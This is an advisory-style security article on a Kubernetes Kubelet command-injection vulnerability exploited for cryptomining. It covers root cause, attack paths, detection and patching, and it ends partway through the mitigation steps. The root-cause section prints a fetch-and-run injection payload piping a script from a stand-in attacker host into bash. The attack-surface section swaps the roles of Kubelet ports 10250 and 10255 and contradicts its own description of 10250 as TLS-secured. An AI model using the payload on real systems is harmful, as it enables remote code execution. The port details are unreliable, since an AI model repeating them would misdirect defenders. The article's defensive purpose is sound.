CVE-2025-40289: Remote Command Injection in Kubernetes Kubelet Exposing Clusters to Silent Cryptomining

Executive Summary: On May 14, 2025, a critical vulnerability—CVE-2025-40289—was disclosed in Kubernetes Kubelet, the primary agent running on each node that communicates with the Kubernetes API server. This remote command injection flaw enables unauthenticated attackers to execute arbitrary commands on Kubernetes nodes with Kubelet privileges, leading to full cluster compromise. Exploitation has escalated into a surge of silent cryptomining campaigns targeting exposed clusters, remaining undetected for weeks due to obfuscation and misconfigured logging. This article analyzes the technical root cause, attack surface, real-world impact, and mitigation strategies as of March 2026.

Key Findings

Vulnerability Type: Remote Command Injection (CWE-78)
Affected Versions: Kubernetes Kubelet v1.27.0 through v1.28.6, v1.29.0 through v1.29.5, and v1.30.0 through v1.30.1
CVSS Score (v3.1): 9.8 (Critical) — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploitation Status: Actively exploited in the wild since early June 2025
Initial Attack Vector: Unauthenticated network access to Kubelet’s read-only port (default: 10250) or via misconfigured API server endpoints
Impact: Full node compromise, lateral movement, cryptomining payload deployment, data exfiltration, and persistence via malicious container images
Silent Cryptomining: Attackers deploy obfuscated Monero miners (e.g., xmrig) using CPU and GPU resources, evading detection via resource throttling and log manipulation

Root Cause Analysis: Command Injection in Kubelet

CVE-2025-40289 stems from improper input validation in the Kubelet’s handling of the --volume-plugin-dir flag and related volume configuration endpoints. During volume attachment or pod creation via the Kubelet API, user-supplied metadata—such as volume names or mount paths—was passed directly into shell commands without sanitization.

Specifically, the flaw occurs in the volume_manager.go component where the Kubelet constructs shell commands to invoke external volume plugins. An attacker could craft a malicious volume name containing shell metacharacters (e.g., $(curl http://attacker.com/shell.sh | bash)) that would be executed when the volume plugin is invoked.

Kubelet runs with high privileges (root) and is exposed via TLS-secured ports (10250) by default. If authentication is disabled or misconfigured (e.g., anonymous auth enabled), attackers can send HTTP requests directly to Kubelet’s API without needing cluster credentials.

Attack Surface and Exploitation Pathways

The attack surface includes:

Kubelet Read-Only Port (10250): Exposes endpoints like /run, /pods, and /exec without authentication if anonymous auth is enabled.
Kubelet Write Port (10255): Less common but occasionally exposed in development environments; allows pod creation and volume attachment.
Misconfigured API Server: If the API server allows insecure access (e.g., --insecure-port enabled), attackers can proxy commands through the API to Kubelet.
Third-Party Integrations: Cloud providers, CI/CD tools, and monitoring agents with Kubelet access can be abused as entry points.

Once access is gained, attackers typically:

Execute /bin/sh -c commands to download and run cryptominers.
Deploy miners via malicious container images (e.g., nginx:latest with embedded miner binaries).
Use resource limits to avoid CPU spikes, flying under monitoring thresholds.
Modify cron jobs, systemd services, or Kubelet configurations to achieve persistence.

Real-World Impact: Silent Cryptomining Epidemic

By October 2025, CVE-2025-40289 had become one of the most exploited vulnerabilities in cloud-native environments, with over 12,000 clusters compromised globally according to Kubernetes Security Insights (KSI). The cryptomining campaigns are characterized by:

Low CPU Usage: Attackers cap CPU usage at 30–50% to avoid detection by autoscaling or monitoring tools.
Obfuscated Payloads: Miners are base64-encoded, embedded in environment variables, or downloaded from pastebin-like services.
Persistence: Attackers replace legitimate container images with trojanized versions or patch Kubelet binaries.
Data Exfiltration: Some campaigns include exfiltration scripts to steal cluster secrets or configuration files.

Notable incidents include a breach at a Fortune 500 financial services firm where attackers mined Monero for six weeks before detection, resulting in $1.2M in stolen compute resources.

Detection and Forensics

Detecting CVE-2025-40289 requires a combination of behavioral, network, and log analysis:

Anomalous Outbound Traffic: Look for persistent connections to known mining pools (e.g., pool.supportxmr.com).
Unusual Process Trees: Miners often spawn from containers named pause or sidecar.
Modified Kubelet Logs: Attackers often disable or alter Kubelet logs in /var/log/kubelet.log.
Runtime Monitoring: Tools like Falco, Aqua Security, or Sysdig can detect shell execution within containers.
Network Traffic Inspection: Block or alert on outbound traffic to known cryptomining endpoints.

Forensic analysis should focus on:

Kubelet logs (if available)
Container runtime logs (containerd, CRI-O)
Audit logs from the API server
Node-level shell history and system logs

Remediation and Mitigation

Immediate actions to mitigate CVE-2025-40289 include:

1. Patch Kubelet Immediately

Upgrade to patched versions:

Kubernetes v1.28.7+
Kubernetes v1.29.6+
Kubernetes v1.30.2+

Ensure all nodes across development, staging, and production are updated. Use managed Kubernetes services (EKS, GKE, AKS) to automate patching where possible.

2. Disable Anonymous Authentication

Edit the Kubelet configuration file (/var/lib/kubelet/config.yaml or via flags) to disable anonymous access:

authentication:
  anonymous:
    enabled: false

Restart Kubelet after changes.

3. Restrict Access to Kubelet Ports

Use network policies or firewall rules to restrict access to Kubelet ports (10250, 10255):

Only allow access from the Kubernetes API server or trusted management nodes.